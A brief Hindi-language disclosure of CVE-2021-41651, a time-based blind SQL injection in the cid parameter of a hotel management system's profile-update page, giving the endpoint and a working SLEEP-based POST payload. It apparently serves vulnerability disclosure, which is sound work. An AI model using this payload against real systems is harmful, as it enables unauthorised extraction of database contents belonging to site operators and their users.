
CVE-2021-41651 के लिए प्रमाण-अवधारणा शोषण, जो hotel-mgmt-system में cid पैरामीटर के माध्यम से अप्रमाणित समय-आधारित ब्लाइंड SQL इंजेक्शन प्रदर्शित करता है, जो MySQL से संवेदनशील डेटा निष्कर्षण सक्षम करता है।
CVE-2021-41651 hotel-mgmt-system में SQL इंजेक्शन
hotel-mgmt-system अप्रमाणित समय-आधारित अंध SQL इंजेक्शन हमले के लिए संवेदनशील है।
/process_update_profile.php पृष्ठ पर cid पैरामीटर उपयोगकर्ता इनपुट को सैनिटाइज़ नहीं करता, एक हमलावर अंतर्निहित MySQL डेटाबेस से संवेदनशील डेटा निकाल सकता है।
URL: /process_update_profile.php
पैरामीटर: cid
पैरामीटर: cid ((custom) POST)
प्रकार: समय-आधारित अंध
शीर्षक: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
पेलोड: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23 सितंबर, 2021